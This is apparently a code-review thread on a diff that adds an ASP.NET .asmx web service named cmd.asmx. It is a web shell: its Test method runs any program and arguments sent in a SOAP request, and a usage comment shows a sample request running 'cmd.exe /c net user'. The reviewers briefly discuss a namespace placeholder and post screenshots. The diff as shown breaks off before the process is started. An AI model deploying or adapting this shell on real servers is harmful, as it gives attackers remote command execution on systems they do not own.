aspx/cmd.asmx

```diff
@@ -0,0 +1,84 @@
+<%--
+Usage:
+POST /test.asmx/Test HTTP/1.1
+Host: example.com
+Content-Type: text/xml; charset=utf-8
+Content-Length: 363
+SOAPAction: "http://tempuri.org/Test"
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <Test xmlns="http://tempuri.org/">
+      <Z1>cmd.exe</Z1>
+      <Z2>/c net user</Z2>
+    </Test>
+  </soap:Body>
+</soap:Envelope>
+--%>
+
+<%@ WebService Language="C#" Class="Service" %>
+using System;
+using System.Web;
+using System.IO;
+using System.Net;
+using System.Text;
+using System.Data;
+using System.Data.SqlClient;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Web.SessionState;
+using System.Web.Services;
+using System.Xml;
+using System.Web.Services.Protocols;
+
+[WebService(Namespace = "http://www.payloads.online/")]
+[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
+
+public class New_Process :Process
+{
+    public New_Process(string s)
+    {
+            
+    }
+
+}
+
+
+public class Service : System.Web.Services.WebService
+{
+    public Service()
+    {
+
+    }
+
+    [WebMethod]
+    public string Test(string Z1,string Z2)
+    {
+        String R;
+
+        ProcessStartInfo c = new ProcessStartInfo(Z1,Z2);
+        Process e = new New_Process("something");
```

Comment:
Is that a placeholder?

Reply:
Namespace is a must to fill, it can directly generate the form. The placeholder is reflected in the comments and can be used by sending HTTP packets.

Reply:
<img width="1402" alt="image" src="https://user-images.githubusercontent.com/19944759/187338010-d87eb4cd-dabf-4c8c-8f54-7f88283bae42.png">

Reply:
<img width="1174" alt="image" src="https://user-images.githubusercontent.com/19944759/187338295-68d89669-c867-4988-a26c-9349ad6f72b1.png">